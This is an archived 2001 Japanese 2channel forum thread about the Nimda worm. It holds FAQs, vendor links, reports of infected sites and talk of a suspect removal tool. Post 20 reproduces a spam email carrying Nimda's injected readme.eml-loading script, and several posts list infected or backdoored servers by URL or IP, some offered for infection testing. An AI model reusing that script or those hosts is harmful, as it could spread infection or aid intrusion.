5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「Nimda !! 」【その4】

1 :名無しさん@お腹いっぱい。:01/10/01 00:42
鬱したな!!親父にも鬱された事無いのに!!

2 ::01/10/01 00:43
●前々々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301

●前々スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●前スレ 「Nimda !! その産」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

3 ::01/10/01 00:44
●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm

IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm

オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

Samba における Nimda ワーム対策
http://www.samba.gr.jp/project/kb/J0/1/09.html

4 ::01/10/01 00:48
●ニムダはWin95/98系など一般のパソコンでは感染しないのですか?

します。

(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

5 ::01/10/01 00:50
●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある?(688)

あります。


●フォルダの設定でWeb表示(.JPGを選択と左側に寒ネイルが表示されるような)で感染サイトの.lnkファイル(お気に入りのこと)を選択す
ると? (460)

(463)
感染可能ブラウザの場合、選択(開くではない)だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。

(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
(IEが未対応だったので)

補足:.htmlなどのファイルでも同様と思われる

6 ::01/10/01 00:50
●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか?(698)

あります。

(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル(キャッシュファイル)にふれてしまうと場合によっては感染する。




●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全?(701)

(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない(感染する)


【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

7 :名無しさん@お腹いっぱい。:01/10/01 01:03
FAQer君がんばってるね。

8 :名無しさん@お腹いっぱい。:01/10/01 01:11
ご苦労さまです。

9 :御苦労様:01/10/01 01:39
http://3403687705/

10 ::01/10/01 08:55
CodeRed も10月になっても消えませんね。

11 :FAQer:01/10/01 11:33
>>7
すいません、今回のコピペは>>1さんにお願いしちゃいました(^^ゞ
3では新しいFAQ項目も増えていないと思いますので・・。

>>1さん、ありがとうございますm(_ _)m

12 :名無しさん@お腹いっぱい。:01/10/01 11:51
>1
お疲れさまー。
今度から、関連リンクやFAQは>>2-10の辺り・・・とやると
よろしいかもー。

13 :名無しさん@お腹いっぱい。:01/10/01 12:39
>>10
CoderedIIは既に新種になっていたみたい。
http://japan.cnet.com/News/2001/Item/010828-3.html?rn

14 :名無しさん@お腹いっぱい。:01/10/01 12:52
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
で、WIN2K SP2のCD-ROMを頼んだ(24日9
今日届いた。
意外と早かったなぁ。

15 :名無しさん@お腹いっぱい。:01/10/01 12:56
>>13

らしいねえ。CodeRedスレでも、10月になっても止まってないってカキコがあった。

まあ、世界中がまだ10月になったわけじゃないけど・・。

16 :名無しさん@お腹いっぱい。:01/10/01 12:57
aplanem395@zzyffrz.com
からNimda付きメールが来たぞ。
McAfeeが捕まえた、入れてて良かった。

17 :名無しさん@お腹いっぱい。:01/10/01 13:01
>>16

来るのかぁ<ニムダメール

このスレでの報告は初?

18 :16:01/10/01 13:09
マジです。ソース書き込もうか?

19 :名無しさん@お腹いっぱい。:01/10/01 14:11
>>18
できれば。

20 :16:01/10/01 14:55

</body>が無いのでこれを書き換えてるのか?

ここから→
From aplanem395@zzyffrz.com Sun, 30 Sep 2001 06:23:47 -0700
Received: from [4.16.194.109] by hotmail.com (3.2) with ESMTP id ; Sun, 30 Sep 2001 06:22:42 -0700
Received:from rly7.fpf.slu.cz (rly7.fpf.slu.cz [172.31.109.14]); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
Received:from(209.156.84.66); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
X-Date: Sat, 29 Sep 2001 10:24:38
From: <aplanem395@zzyffrz.com>
Message-Id: <KbSmp24a.KFSm7i5IT4wlzYi.KtWmWi2C.KM5V7ueZO.KTJhqjq@rly7.fpf.slu.cz>
Subject: Get Rid Of Debt - Consolidate!
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Date: Sat, 29 Sep 2001 21:25:40


<html>
<head>
</head>
<body bgcolor="#ffffff" topmargin=2 leftmargin=5 rightmargin=5 marginwidth=5 marginheight=0 >
<div id="divMsgrObject" style="display:none"></div>
<p>
<s


<CENTER>
<table border=0 width=100% cellpadding=0 cellspacing=0 bgcolor="#000000">
<tr><td valign=top>
<pre>

</pre>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>CUT YOUR  MONTHLY DEBT
PAYMENTS IN HALF !</FONT></B>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff><i>EVERYONE QUALIFIES!</i></FONT></B></p>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>FREE PHONE CONSULTATION - NO
OBLIGATION!</p>
<P align="center"><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color='HotPink'>CLICK
</font></a></FONT><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color="HotPink" size="+3" face="Arial,Helvetica">HERE
FOR DETAILS!</font></a><P align="center"><a href="mailto:removes@web-advs.net"><font face="Arial,Helvetica" size="1" color="#FFFFFF">Click
Here To Be Removed</font></a></B><br>
<br>
</td></tr>
</table>

</form>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>


←ここまで

21 :19:01/10/01 15:12
>>20
これは若干違うもののような気がするな。
ワームが送ってきたメールとは思えない…

思うに、このメールの原文がDISK上にHTMLファイルで保存されてて
そこにNimdaが感染して、最下行を書き換えて、
Nimdaは駆除したけど(?)そのままになってたのを、
単純にSPAMで送ってきた、という機序なのではないかと。
メールで誘導してるURLのポートが81番つうのが怪しいんだが(w

どちらにせよ送信元が間抜けなのは間違いなかろう。

22 :16:01/10/01 17:25
お騒がせしました。

23 :19:01/10/01 17:36
>>22
いや、貴重なサンプルです。ありがとうございました。

24 :1:01/10/01 17:45
その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

25 :FAQer:01/10/01 21:42
このスレと、にむだにはいろいろ勉強させてもらったよ・・。

26 :名無しさん@お腹いっぱい。:01/10/01 21:44
http://www.bee.woodland.co.jp
駆除はしたみたいだけど、まだIIS/4.0なんだよなー

27 :名無しさん@お腹いっぱい。:01/10/01 21:44
今日の夕刊フジにニムダが載っていますね。

流行後一段落後に新聞に載ったのは初?

28 :26:01/10/01 21:45
あ゛っ
まだreadme.emlが残ってる。

29 :名無しさん@お腹いっぱい。:01/10/01 21:46
>>26

いつ再感染するんかワクワク

30 :名無しさん@お腹いっぱい。:01/10/01 21:50
>>28

http://www.bee.woodland.co.jp/readme.eml

だめぢゃん( ̄△ ̄;

なにやってんだよ。バックアップから上書きでリストアしただけか?
豪快なウイルス駆除法もあったもんだ・・。

31 :名無しさん@お腹いっぱい。:01/10/01 21:52
http://www.zumensoft.co.jp/

ここは閉鎖中。

beeとどっちがさきにまともになるか。

32 :名無しさん@お腹いっぱい。:01/10/01 21:57
>>31
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
Norton Antivirus2000がダメだって。。。。

33 :名無しさん@お腹いっぱい。:01/10/01 22:15
>>32

はっきりいってやりたいのだが、ウイルススキャンソフトを実行して再起動するだけしかやらないなら、どのソフトだってダメだ<対にむだ

34 :名無しさん@お腹いっぱい。:01/10/01 22:31
IE6で感染する事例が増えた原因がわかった・・。


IEで「.exe」などのファイルにアクセスすると、「ファイルのダウンロード」
という確認ダイアログウィンドウが現れるわけですが、IE 5のときは、

次の場所からファイルをダウンロードするように選択しました。
このファイルの処理方法
○ このプログラムを上記の場所から実行する
◎ このプログラムをディスクに保存する
[ OK ] [キャンセル]

というように、デフォルトはディスクへの保存となっていて、直接開くには、
二回のクリック(「上記の場所から」と「OK」)が必要でした。

それが、なんと、IE 6では、「開く」がデフォルトになってます。

キャプチャ画像(上がIE 6、下がIE 5)
http://java-house.etl.go.jp/~takagi/security/misc/ie6-filedownload-dialog.png

これって危な過ぎるような。ワンクリック手がすべるだけでドカンでしょう。

35 :名無しさん@お腹いっぱい。:01/10/01 22:35
■『Nimda』、再襲来は不発
http://japan.cnet.com/News/2001/Item/011001-3.html?mn
『Nimda』(ニムダ)攻撃の第2波は失敗したようだ。Nimdaワームが28日
に再発するとセキュリティー企業は警告していたが、この懸念は現実の
もとはならなかった。最初の感染から10日後に活動を再開するとされて
いたが、10日後にあたる28日の朝、Nimdaの再襲来を告げる徴候はほと
んど見られなかった。

36 :名無しさん@お腹いっぱい。:01/10/01 22:47
>>32

>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません

効き目がないというのは何を意味してるんだ?
自分がウイルスを助けるような操作をしても注意してくれないということか?

37 :名無しさん@お腹いっぱい。:01/10/01 23:30
age

38 :名無しさん@お腹いっぱい。:01/10/01 23:35
>>32

>な〜に寝ぼけたこと言ってるんですか。
>2ちゃんねるで晒されてまっせ。
>http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573

ワラタ&ユウキアル

39 :名無しさん@お腹いっぱい。:01/10/01 23:54
>>38

にちゃんねらーにもいいひといるんだなぁ・・。


づめんそふとのヒトは前スレもみてくれるだろうか。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

40 :名無しさん@お腹いっぱい。:01/10/02 00:00
>>34
そそ危険危険デフォルトが開くってなんとかならんかな。
デフォルトの変更方法求む

41 :名無しさん@お腹いっぱい。:01/10/02 00:00
なんじゃこら>にむだの項

http://www.hh.iij4u.or.jp/~noguti/docs/gaihuu/9gatunikkikou.html

42 :名無しさん@お腹いっぱい。:01/10/02 00:10
をいっ(^^;

http://www.d-link.co.jp/

43 :名無しさん@お腹いっぱい。:01/10/02 00:11
予想通り再開せず

http://www.with9.com/

44 :名無しさん@お腹いっぱい。:01/10/02 00:14
つーか、恥ずかしくないのかね。

看板に落書きされたようなもんだろう。
いつまでも閉鎖したままだったり、汚染されっぱなしで。

会社の看板もこうなのかね、こういう会社は。

45 :名無しさん@お腹いっぱい。:01/10/02 00:17
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.advaoptical.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/

http://pc2.autechs-unet.ocn.ne.jp

http://www.with9.com/

46 :名無しさん@お腹いっぱい。:01/10/02 00:19
http://211.135.69.237/hoge

なんなんだよここはっ(><)

47 :名無しさん@お腹いっぱい。:01/10/02 01:29
ns1.ojipack.co.jp
土曜にホームページに載ってたアドレスにメールした。
けど、今日になっても直してな〜い。

48 :名無しさん@お腹いっぱい。:01/10/02 02:03
p4166-flets-adsl01osakakita.osaka.ocn.ne.jp
日本在住韓国人?

49 :名無しさん@お腹いっぱい。:01/10/02 02:58
http://plaza12.mbn.or.jp/~kaiun/

なんだこりゃ

50 :名無しさん@お腹いっぱい。:01/10/02 03:29
>>49
ワラタ

51 :名無しさん@お腹いっぱい。:01/10/02 04:53
http://www.hyundaijapan.co.jp/
また鯖止めてるョ。

52 :名無しさん@お腹いっぱい。:01/10/02 07:51
>>51

弐週間も何やってたんだ(--#

53 :名無しさん@お腹いっぱい。:01/10/02 08:15
>>32

このヒトたちのカキコには最新パターンファイルにアップした形跡がないんだけど・・。

54 :名無しさん@お腹いっぱい。:01/10/02 10:03
SP2収録された雑誌って発売されました?

55 :名無しさん@お腹いっぱい。:01/10/02 10:10
nimda発生の頃から今までずっと鯖停止している会社は、
鯖がnimdaに汚染されて復旧できていない、とみなして良いのだろうか?
結構そういう会社があるのだが。

しかしそういうところは恥ずかしくないのかね。
>44の言う通りだよ。
きちんと管理できないなら最初から看板(サイト)なんて出さなければいいのに。

56 :名無しさん@お腹いっぱい。:01/10/02 10:11
>>54
ttp://www.vwalker.com/news/0105/24_/24_190311.html

>なお,Windows2000SP2はDOS/Vmagazine 6月15日発売号のCD-ROMに収録予定。

57 :名無しさん@お腹いっぱい。:01/10/02 10:38
厨房質問ですが、Nimdaに感染したサイト一覧をリアルタイムで出している処ってあります?
ご存じの方はおせーて┌(_ _)┐

58 :名無しさん@お腹いっぱい。:01/10/02 10:46
>>57
逆にききたい。
ダイアルアップ非固定アドレスの感染者がいたらどうやって
リアルタイムでわかるんだい?

59 :名無しさん@お腹いっぱい。:01/10/02 11:05
>>58
攻撃されれば分かる(w

ダミーのroot.exeとかredeme.exeとか作っておいとけ(ww

60 :名無しさん@お腹いっぱい。:01/10/02 11:08
>>57
リアルタイムとは言えないかもしれないが、専用のニムダ晒しサイトはなくとも、一般のサービスでなぜか教えてくれるところがある。

アタマ使うなり、過去ログ読むなりするんだな。

61 :名無しさん@お腹いっぱい。:01/10/02 11:10
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

ここのヒトは読んでくれたのかね。

62 :名無しさん@お腹いっぱい。:01/10/02 11:12
>>57は最終的に何が知りたいのかわからんが、過去の感染サイトを巡回すると、経験上かなりの確率で再発してるぞ(w

63 :57:01/10/02 11:12
>58
> ダイアルアップ非固定アドレスの感染者がいたらどうやって
> リアルタイムでわかるんだい?
もぉ〜ん、アタシ厨房なんです。揚げ足取られるとすぐ転んぢゃうんです。

訂正します。
ある程度まとまって、Nimda感染サイトを一覧できるところを教えてください。
目的は、IE6の動作を試してみたいんです。

64 :名無しさん@お腹いっぱい。:01/10/02 11:16
>>58
ハア?

>>57の質問はリアルタイムって逝ってるんだから
攻撃されなきゃわかんないだろ。
それとも自分が攻撃されたらリアルタイムサイトも攻撃されてる
のか?(w
Nimda感染サイトは感染すると全世界のIPを攻撃してるのか?

それを踏まえてちょっとからかったんだよ。

65 :64:01/10/02 11:17
>>58>>59でした。

66 :名無しさん@お腹いっぱい。:01/10/02 11:22
>>65
過去ログ読め。

67 :名無しさん@お腹いっぱい。:01/10/02 11:25
>>64
からかったつもりが自分の厨房ぶり晒してるぞ。

68 :57=64:01/10/02 11:27
>>63 = >>57

繰り返しになるが、ダイアルアップの人が感染者なら
攻撃受ける前にすぐPC落としちゃったらそいつが感染者か
どうかわかんないだろ?
自分で鯖たててみるのが一番手っ取り早いと思う。

この板でしばしば取り上げてる「また感染してるのかよ」なサイト
はフレッシュアイで検索してるだけだと思われるが、この方法
だとIIS以外ででっちあげた自作自演サイトも区別しないので
おすすめしない(w

69 :57=64:01/10/02 11:31
>>67
どこが?
リアルタイムで知るっていうことは、今現在の感染サイトの実数
を知りたいと解釈したが?
それを鯖たてればわかるといわれてもね
一部しかわかんないよ(w

70 :57=64:01/10/02 11:34
>>65
過去ログに実数がわかるサイトなんてあったか?
見たおぼえないので示してください。

そんなサイトはありません。

71 :57=64:01/10/02 11:36
また間違えたよ。鬱だし脳

57=64でなくて、58=64だよぉ

72 :名無しさん@お腹いっぱい。:01/10/02 11:36
>>63
なんか>>63の質問の趣旨を理解できない厨房がいるようだが・・。

このスレの感染しているよ、と晒されているサイトはあたってみたのかい?>>63

73 :63:01/10/02 11:53
>72
> このスレの感染しているよ、と晒されているサイトはあたってみたのかい?>>63
厨房でスマソ(;´Д`)

アタシ個人はいくつか逝ってみました。
何がやりたいかと云うと、私を含めて何人かで、OS再インストール予定マシンでIE6を試そーよと、ドキュソ計画を実行中なんです。
アタシはもう十分なんですが、アタシ以下の消防が感染サイトをきぼーん、ただしメールでURLを書いて送るな、バックアップした後もっぺんクリックしたら感染するだろーが、まとまった情報をながしている処をおせーろゴルァと責めるんです。

ここの「Nimda!!」1〜4を示したんですが、消防だからテメーで過去ログ読まないんです。
ぢゃあアタシが過去ログ読んで、それをまとめてアタシのホームページにアップするんかいと、今泣いているんです。

すみません、職人さんが集まっているところで、厨房がスレ汚したようです。
逝きます。

74 :名無しさん@お腹いっぱい。:01/10/02 12:07
>>73
そうするとこのへんかねえ。

http://people.site.ne.jp/mirror2/Nimda/Nimda.txt
https://www.netsecurity.ne.jp/article/8/2923.html
https://www.netsecurity.ne.jp/article/9/2842.html
https://www.netsecurity.ne.jp/article/8/2874.html
https://www.netsecurity.ne.jp/article/8/2877.html

だが先週あたりまではまめに更新していたものの、今週は更新されてないし、
駆除・閉鎖されているところも多い。
(たぶん今も感染状態で開いているところはほとんどないはず。)

感染サイトは生もので、やはりというか当然というか普通は
晒されたら閉鎖・駆除をしてしまう。
73の趣旨からすると、現役感染サイトが知りたいのだろうから、
このスレをチエックして感染してるよ、となったらそれで動作確認、となるんだろう。

ただIE6はいくつかの条件で感染することがわかっているから、
実際に感染しているサイトで感染実験するのはあまり薦められないし、
そのうちひとつの条件で感染した・しないといってもあまり意味はないように
思う。

75 :73:01/10/02 12:34
>74
> そうするとこのへんかねえ。
わぁをぅ、有り難うございます。
https://www.netsecurity.ne.jp/
ここからたどると、ある程度最新が判るんですね。
これで消防に逝ってもらいます。

> ただIE6はいくつかの条件で感染することがわかっているから、
> 実際に感染しているサイトで感染実験するのはあまり薦められないし、
> そのうちひとつの条件で感染した・しないといってもあまり意味はないように
> 思う。
アタシがやった時はWindows Media Playerが起ち上がったんですが、ダウンロードで開くがデフォルト選択状態を試したいと消防が駄駄捏ねるんです。ほかの*.exeではダメなんです。
ちなみに消防とは上司です。
さらにアタシの目的は、消防以下ばかりの会社のマシンからIE6を駆逐しておかないと、大変なことになるのを実証したいんです。
面倒かけました。

76 :名無しさん@お腹いっぱい。:01/10/02 13:01
>>75
とりあえず感染サイト。

http://211.96.111.55/

77 :名無しさん@お腹いっぱい。:01/10/02 13:32
>>73
>ただしメールでURLを書いて送るな、
>バックアップした後もっぺんクリックしたら感染するだろーが、
>まとまった情報をながしている処をおせーろゴルァと責めるんです

ここらへんがホント頭悪いよね。
別にフルアドレス書かなくてもいいじゃん。
例えば、211.96.111.55 これだけ書いて
http://自分で付けさせりゃ済む話だと思うが。

と言いつつ、おまけ。
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi

78 :名無しさん@お腹いっぱい。:01/10/02 14:29
ありゃま。

http://z.nttec.edu.cn

79 ::01/10/02 14:33
http://www.d-plan.ne.jp/

readme.eml ダウンロードのスクリプトが2行あるのは
2回改竄されたってこと?

>快適ネットが自慢です!! 大きな信頼!! 低コストが魅力です!!
が売り物のネットワークサービス会社だが。。。

80 :名無しさん@お腹いっぱい。:01/10/02 14:35
>>79
index.* には2種類の感染経路があるので
2行書かれてしまうみたいです。

81 ::01/10/02 14:41
eml その他を削除し、セキュ穴やバックドアも埋め、
パッチを当てているとしても、
Webのコンテンツにスクリプト残したままでそれを公開ってのは
結構見た目不細工だと思うのだが、みなさん平気なのかな。。
(このタイプのサイト結構ある)
よごれてない原本使ってかきもどせばよかろうに。

82 :名無しさん@お腹いっぱい。:01/10/02 14:56
>>81
ヨソに作ってもらってるから原本がない(なくしちゃった)だったり(w

いや、けっこうあるんです、こういうとこ(苦笑

83 :名無しさん@お腹いっぱい。:01/10/02 15:05
なるほど、ソースの最後にJavaScriptが空で残ってるサイトは
そういうことなのか(w

84 :名無しさん@お腹いっぱい。:01/10/02 15:06
>>80
じゃあこれなんかは・・?

http://ns.ers.minato.tokyo.jp/

85 :名無しさん@お腹いっぱい。:01/10/02 16:03
>>84
バックドアはあいてるね。

こんなマヌケな法案審議する暇あったらこういうのをなんとかしろ
http://www.mainichi.co.jp/digital/houan/01.html

86 :名無しさん@お腹いっぱい。:01/10/02 16:33
http://www.zumensoft.co.jp/

復活したのか?やればできるじゃん?

87 :名無しさん@お腹いっぱい。:01/10/02 16:34
>>86
と、思ったが

ページが見つかりません

のリンクがいくつもあるな。

88 :名無しさん@お腹いっぱい。:01/10/02 16:38
>>84
12か?12もか?


<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

89 :名無しさん@お腹いっぱい。:01/10/02 16:56
>>79
どうやらIISからApacheに変更したようだね。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.d-plan.ne.jp/

90 :名無しさん@お腹いっぱい。:01/10/02 17:01
NimdaやCodeRedの影響で、IISから他のWebサーバに
乗り換えたサイトってどのくらいあるんだろう。

IISから他への移行って難しいことが多いみたいだ
けど。

91 :名無しさん@お腹いっぱい。:01/10/02 17:11
>>90

>>86 とか?

92 :名無しさん@お腹いっぱい。:01/10/02 17:18
>>91
違うような気がするが。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.zumensoft.co.jp/

93 :名無しさん@お腹いっぱい。:01/10/02 18:01
>>92
あ、Web鯖だけを、ってことね。

ここはWindowsごとおっぽりなげた、と。

94 :名無しさん@お腹いっぱい。:01/10/02 20:06
ちょっと聞いておくれよ。 さっき2ch見ててNimdaに感染しちゃったよ。
安置うぃるすで除去してくれたけどね。
IE6なんて役に立たないジャン。

95 :名無しさん:01/10/02 20:23
IEはみなダメだよマイクロソフト
信じてはだめだよ。
アンチウィルスソフト入れてればわかるが
いれてない人は知らずに使用してると思うよ

96 :名無しさん@お腹いっぱい。:01/10/02 20:24
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
この会社本当にアプリ開発してるんですか?
多分ユーザーにはパソコンに詳しい神様みたいな存在なんでしょうけどねー。

人間を観察するという立場で見れば興味あるサンプルではあるょ。

97 :1:01/10/02 20:29
http://www.nt.sakura.ne.jp/~rose/

98 :名無しさん@お腹いっぱい。:01/10/02 20:32
>>96
>2ちゃんえるというHPでワクチンを入手できるのですか?

再度ワラタ
かきこした人ちゃんと教えてやれ

99 :94:01/10/02 20:33
>>95 そっかやっぱり
当分BSD使います。

100 :IE6.0だから心配なし:01/10/02 20:33
>>94
IE6は、完全インストールしないと(OE使わなくとも)

私は、何度もNimdaサイトで試験済みだよ
ダウンロードしますで、Yesにしたら、感染するよ

101 :名無しさん@お腹いっぱい。:01/10/02 20:52
>>98

再感染も時間の問題か・・。

102 :名無しさん@お腹いっぱい。:01/10/02 22:04
http://pcweb.mycom.co.jp/news/2001/10/02/15.html

103 :名無しさん@お腹いっぱい。:01/10/02 22:23
Nimdaに感染するとどうなるんですか?
あたいのキャッシュにreadme.emlとか有って
即削除したけどこれでいいんですよね。

104 :名無しさん:01/10/02 22:32
>>102
これに該当するファイルを以前窓の杜からダウンロードしてしまった。(9/22日)
ついでに実行も。

自己解凍形式のexeファイルで、解凍すると、
fix_nimdaフォルダが作成され、中にFIX_NIMDA.exe Slide.dat slide.exe等
7つのファイルが出来る。

どうみても>>102の条件に合致するのだが。

さっき窓の杜見てみたら、その事に関して何のインフォメーションも無く。
fix_nimdaの紹介もアップデートされていた。
窓の杜は怪しいファイルを無責任にばら撒いて知らん振りするつもりなのか?
それともただ知らないだけなのか?謎。

105 :それが本当なら:01/10/02 22:49
>>104
祭りか? 祭りか?
ワショーイ

106 :名無しさん@お腹いっぱい。:01/10/02 23:02
>>104
ニセモノは4つのファイルだが、7つなのか?

107 :104:01/10/02 23:02
FlashGetでのダウンロード履歴をみて見たら、
ftp://ftp.forest.impress.co.jp/pub/win/util/security/trendmicrofixnimda/fix_nimda.exe
ここになっていた。(いまは消えて存在しない)
さっき見てみたら同じディレクトリには3180fixnimda.exeが有った。

なんか非常に不愉快。詳しい情報希望。

108 :106:01/10/02 23:04
ごめん本物も4つのファイルが解凍されるとある。
ってことはそれらを含めた7つというのも妙だな。

109 :104 ◆qN2/EELQ :01/10/02 23:07
>>106
107でも書いたけど、fix_nimda.exeで(87,318バイト)
そこからダウンロードして解凍されたフォルダの中身は
fix_nimdaフォルダの中に

faq.txt FIX_NIMDA.exe NIMDA対策ツール使用許諾.pdf Slide.dat
slide.exe お読みください.txt 始めにお読みください.txt の7つだった。

110 :名無しさん@お腹いっぱい。:01/10/02 23:12
>>109
http://search.impress.co.jp/cgi-bin/namazu.cgi?idxname=forest&query=FIX_NIMDA&imageField.x=23&imageField.y=6
http://www.trendmicro.co.jp/nimda/tool.asp
バージョンUPしてるみたいだね

111 :名無しさん@お腹いっぱい。:01/10/02 23:13
ttp://www.miruku.co.jp/usr/find/higa.htm
尋ね人(w

112 :名無しさん@お腹いっぱい。:01/10/02 23:16
>>111
鯖感染バックドア付き

113 :104 ◆qN2/EELQ :01/10/02 23:25
>>110
でもfix_nimda.exeをダウンロードした時はFIX_NIMDA.exe(.comじゃなくて)
だった。それにslide.exeとSlide.datって一体何なのだろうか?

私と同様な覚えの有る人(窓の杜経由fix_nimda.exe入手)は居ないのかな?

114 :名無しさん@お腹いっぱい。:01/10/02 23:26
Mimraに感染しました。

115 :名無しさん@お腹いっぱい。:01/10/02 23:35
>>104
http://inet.trendmicro.co.jp/virusinfo/vcon/default3.asp?VName=TROJ_BIONET.313
多分もう調べたと思うけどfix_nimda.exeに入ってるBionetに感染すると
ICQ経由でリモートコントロールされるみたいっすよ。

116 :名無しさん@お腹いっぱい。:01/10/02 23:44
http://www.isee.net.cn/

117 :名無しさん@お腹いっぱい。:01/10/02 23:54
http://www.trendmicro.co.jp/nimda/tool.asp

保存していたぺージから、

Version 1.22 ASPファイルの駆除に対応。
         WindowsNTのワトソン博士でエラーを出力する件への対応。
         非英語名ファイルが駆除できない件に対応。
         ゲストユーザーアカウントの無効に対応。(WindowsNT/2000)
         オプション /UNSHARE を追加。

このツールは3つの部分で構成されています。
 1.FIX_NIMDA.exe -- ツールのメインの部分
 2.SLIDE.DAT ----- HTM/HTML/ASPを検索および駆除用パターンの部分
 3.SLIDE.EXE ---- HTM/HTML/ASPを検索および駆除を行う部分
             (FIX_NIMDA.exeから実行されます)
 4.README_J.txt -- Readmeファイルです。ご使用の前にお読みください。
------------------------

で、今見てきたら、変わってた。

Version 1.23 駆除処理のログ記録に対応。
         検出精度の向上。

ツール実行時に解凍されるファイルは以下の4ファイルです。
 1.Fix_NIMDA.com -- 駆除ツール本体
 2.FixNimda.bat ----- 自動実行用バッチファイル
 3.psapi.dll ---- 実行に必要なDLLファイル
 4.readme.txt -- Fix_NIMDA.comマニュアルファイル

ファイルが7つ?

118 :名無しさん@お腹いっぱい。:01/10/02 23:56
http://210.102.151.10

119 :104 ◆qN2/EELQ :01/10/02 23:58
>>115
そうなんですよね。
一応レジストリとか調べて見たけれど、感染している様子は無いから、
ただの杞憂だったのかな。どっちなのか本当にわからん。

しかし窓の杜でアップデートをした時にひっそりとファイル名や構造が変わって、
以前ダウンロードしたものが安全なのか危険なものなのか情報を提供しない
という姿勢には疑問を感じる。

120 :名無しさん@お腹いっぱい。:01/10/03 00:04
http://www.trendmicro.co.jp/nimda/tool.aspに、
>ダウンロードされる前に、使用許諾契約書(PDF形式 9KB)をお読みください。

ってあるから、あとは、
 [ お読みください.txt 始めにお読みください.txt ]
の2つがくっついてるのか。

http://pcweb.mycom.co.jp/news/2001/10/02/15.html
では、メールの添付ファイルって書いてるから、
ダイジョブじゃないの?たぶん(w

121 :名無しさん@お腹いっぱい。:01/10/03 00:14
http://210.103.173.1/

122 :名無しさん@お腹いっぱい。:01/10/03 01:11
やっぱkrはニムダ大国だ・・。

123 :名無しさん@お腹いっぱい。:01/10/03 01:36
http://wtc.trendmicro.com/wtc/
日本の感染報告件数がピーク時の300分の1ぐらいまで激減しているようなんですけど
感染しているいないに関わらず興味が無くなっただけなのか?

ところでアタックは相変わらずなんでしょうか?
CATVだとわからないので教えてください。
私の所はCodeRedが1日の8時ぐらいを最後に永眠したようで1件も来なくなりました。

124 :名無しさん@お腹いっぱい。:01/10/03 01:43
>>123
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
ここを読むと分かりますが、感染していても動いていればおかまいなしというのが趨勢のようです。

125 :名無しさん@お腹いっぱい。:01/10/03 01:45
本人はいいかもしれんが
他人に広がる以上,放置はねぇ

126 :名無しさん@お腹いっぱい。:01/10/03 01:53
>>125
